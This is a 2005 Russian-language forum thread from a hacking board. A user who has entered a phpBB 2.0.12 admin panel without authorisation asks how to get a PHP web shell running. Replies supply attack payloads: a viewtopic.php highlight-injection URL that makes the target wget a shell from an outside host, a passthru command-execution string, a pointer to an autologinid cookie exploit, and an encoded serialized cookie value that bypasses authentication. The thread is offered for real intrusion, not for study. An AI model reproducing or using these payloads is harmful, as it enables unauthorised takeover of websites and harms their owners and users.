Форумы O5 25: phpBB, админка, шелл

Discussion in 'Уязвимости CMS/форумов' started by Buddy, 9 Oct 2005.

  1. Buddy

    Buddy New Member

    Joined:
    9 Oct 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Есть сайт -> на нём phpBB 2.0.12 -> смог проникнуть в админку и залить пхп-шелл как аватары, но они соответственно с расширениями .gif или .jpg и их нельзя запустить.

    Как можно воспользоваться этими "аватарами", или как залить на сайт шелл с расширением .php, чтобы его можно было запустить?

    Слышал, что можно через восстановление БД, но не знаю какой запрос и как именно писать.

    Весь день лазил по рунету, но так ничего и не нашёл, кроме того, что это можно сделать.

    ПОМОГИТЕ! ПОКАЖИТЕ ИЛИ ДАЙТЕ ССЫЛКИ!
     
  2. Buddy

    Buddy New Member

    Joined:
    9 Oct 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    На вашем сайте видел такой способ:
    http://target/phpbb2/viewtopic.php?xxx=wget%20http://shell/shell.php&p=123&highlight=%2527.system($_GET[xxx]).include%2527
    Но он не работает.
     
    #2 Buddy, 9 Oct 2005
    Last edited: 9 Oct 2005
  3. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    там же можно изменить разрешшения файлов загружаемых в админке
     
  4. Buddy

    Buddy New Member

    Joined:
    9 Oct 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Как менять расширения файлов через админку я не знаю, т.к. на том форуме нет никаких дополнительных модов вроде downloads! Голый непропатченый форум.
     
  5. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Нельзя там через файлы загрузить шелл.

    Понимаешь, эти строки выложены (мной кажется) для того чтобы те кто их использует ПОНИМАЛИ что они делают. Если просто вбить ее в браузер, заменив там адрес сайта то работать это будет в 10% случаев. Ты сначала пойми что это за баг а потом попробуй сам догадаться почему ничего не работает.

    Чтобы небыло опять двацпять надо смотреть видео и читать сорцы и статьи про phpBB
     
  6. Buddy

    Buddy New Member

    Joined:
    9 Oct 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    2 KEZ

    В той строке я понимаю, что мы в файл пытаемся включить наш же собственный запрос, но эта дырка уже не работает в версии 2.0.12.

    Я же говорю, весь день сегодня читал/смотрел, но так ничего и не нашёл. Наверное просто не знаю что именно искать. Поэтому и прошу помощи.

    Мне кажется, в данной ситуации нужно пытаться через восстановление БД, но я не знаю какой именно запрос и в какой части базы писать, т.к. практически не знаю MySQL. Подскажите плиз. Или дайте линки, где читать.
     
  7. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Ну руками это будет сделать непросто, попробуй сплойтик... Есть там один для дырки в autologinid переменной в кукисах... Видео смотри оно есть
     
  8. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    А разве highlight='.passthru($HTTP_GET_VARS[cmd]).' не работает на 12 версии?
     
    _________________________
  9. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D